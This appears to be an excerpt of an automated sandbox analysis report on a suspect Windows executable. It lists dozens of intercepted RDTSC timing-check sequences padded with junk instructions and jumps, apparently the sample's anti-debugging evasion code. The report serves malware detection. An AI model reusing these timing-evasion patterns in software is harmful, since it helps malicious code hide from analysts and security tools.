                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6A26 second address: CD6A2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6A2C second address: CD6A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6A38 second address: CD6A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6BC2 second address: CD6BCB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6BCB second address: CD6BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6F7F second address: CD6FAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF15A7F5Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8AF15A7F67h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6FAB second address: CD6FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF438h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6FC8 second address: CD6FDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F5Ch 0x00000007 pushad 0x00000008 je 00007F8AF15A7F56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD6FDF second address: CD6FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7142 second address: CD717C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F8AF15A7F56h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F8AF15A7F5Ch 0x00000014 jo 00007F8AF15A7F70h 0x0000001a jmp 00007F8AF15A7F68h 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD72ED second address: CD7303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8AF10CF42Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7303 second address: CD731E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F61h 0x00000007 jnp 00007F8AF15A7F56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD731E second address: CD733D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8AF10CF42Ch 0x00000008 je 00007F8AF10CF426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jl 00007F8AF10CF432h 0x00000017 jbe 00007F8AF10CF426h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD733D second address: CD7344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD74BC second address: CD74D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8AF10CF431h 0x00000009 jns 00007F8AF10CF426h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD761D second address: CD7623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7623 second address: CD7628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7628 second address: CD7653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8AF15A7F56h 0x0000000a popad 0x0000000b jmp 00007F8AF15A7F5Fh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F8AF15A7F56h 0x0000001b js 00007F8AF15A7F56h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7653 second address: CD7664 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F8AF10CF426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7A1F second address: CD7A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7A25 second address: CD7A6E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8AF10CF426h 0x00000008 jmp 00007F8AF10CF42Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8AF10CF437h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8AF10CF436h 0x0000001b jc 00007F8AF10CF426h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CDFB42 second address: CDFB4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CE5968 second address: CE5995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F8AF10CF430h 0x0000000a jmp 00007F8AF10CF432h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CE5995 second address: CE5999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CE8190 second address: CE81AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8AF10CF437h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CE7CD7 second address: CE7CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F68h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CE7E53 second address: CE7E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F8AF10CF426h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CEC032 second address: CEC037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CEC037 second address: CEC077 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF10CF438h 0x00000008 jmp 00007F8AF10CF432h 0x0000000d jmp 00007F8AF10CF42Ch 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 js 00007F8AF10CF42Ch 0x0000001b jne 00007F8AF10CF426h 0x00000021 pushad 0x00000022 jg 00007F8AF10CF426h 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF05B5 second address: CF05D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF05D2 second address: CF05E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F8AF10CF426h 0x00000009 jp 00007F8AF10CF426h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF05E8 second address: CF05EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF0754 second address: CF0760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8AF10CF426h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF0760 second address: CF076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jp 00007F8AF15A7F56h 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF076F second address: CF0779 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8AF10CF432h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF08A1 second address: CF08A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF08A5 second address: CF08C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8AF10CF43Bh 0x0000000c jmp 00007F8AF10CF435h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF0A04 second address: CF0A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF0A0A second address: CF0A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF0C8A second address: CF0C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF0E01 second address: CF0E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8AF10CF42Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF1A0B second address: CF1A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF15A7F69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8AF15A7F68h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF7320 second address: CF7324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF7324 second address: CF733B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF733B second address: CF7340 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF7340 second address: CF7349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF7349 second address: CF734D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF6A91 second address: CF6A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF6A97 second address: CF6AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8AF10CF426h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F8AF10CF42Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF6AAD second address: CF6AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CF6AB1 second address: CF6AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFDA89 second address: CFDA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFDA8F second address: CFDAA9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8AF10CF426h 0x00000008 jmp 00007F8AF10CF42Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFDDB6 second address: CFDDEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF15A7F64h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F8AF15A7F56h 0x00000012 jmp 00007F8AF15A7F63h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFDDEB second address: CFDDFF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F8AF10CF426h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F8AF10CF426h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFDDFF second address: CFDE1F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8AF15A7F56h 0x00000008 jnl 00007F8AF15A7F56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 jmp 00007F8AF15A7F5Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFE0EB second address: CFE0FB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8AF10CF42Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFE0FB second address: CFE105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8AF15A7F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFE105 second address: CFE109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFE921 second address: CFE925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFE925 second address: CFE929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFF1A1 second address: CFF1BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F68h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFF1BD second address: CFF1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8AF10CF42Bh 0x0000000e push ebx 0x0000000f jmp 00007F8AF10CF435h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CFF1EA second address: CFF1EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D045C4 second address: D045C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D045C8 second address: D045CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D045CE second address: D045E0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8AF10CF42Ch 0x00000008 js 00007F8AF10CF426h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D045E0 second address: D045E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D045E4 second address: D045FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F8AF10CF42Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D045FC second address: D0460A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8AF15A7F56h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D0395E second address: D03963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D03963 second address: D03969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D03969 second address: D03993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF436h 0x00000009 js 00007F8AF10CF426h 0x0000000f popad 0x00000010 pushad 0x00000011 jns 00007F8AF10CF426h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D03AED second address: D03B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8AF15A7F62h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D03B07 second address: D03B0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D03B0D second address: D03B27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F8AF15A7F56h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F8AF15A7F58h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D03E5B second address: D03E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D04006 second address: D0400C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D0400C second address: D0402A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007F8AF10CF42Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jp 00007F8AF10CF426h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D0402A second address: D04035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D0418A second address: D0418E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D0418E second address: D041B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF15A7F68h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D041B0 second address: D041BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8AF10CF426h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D11EFC second address: D11F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8AF15A7F56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D100DF second address: D10114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F8AF10CF432h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D10114 second address: D10118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D10118 second address: D1011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D1011C second address: D10122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D10122 second address: D10128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D10128 second address: D1012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D1012C second address: D10138 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D10138 second address: D1013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D1013E second address: D10142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D10E18 second address: D10E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D10E1E second address: D10E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D10E22 second address: D10E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
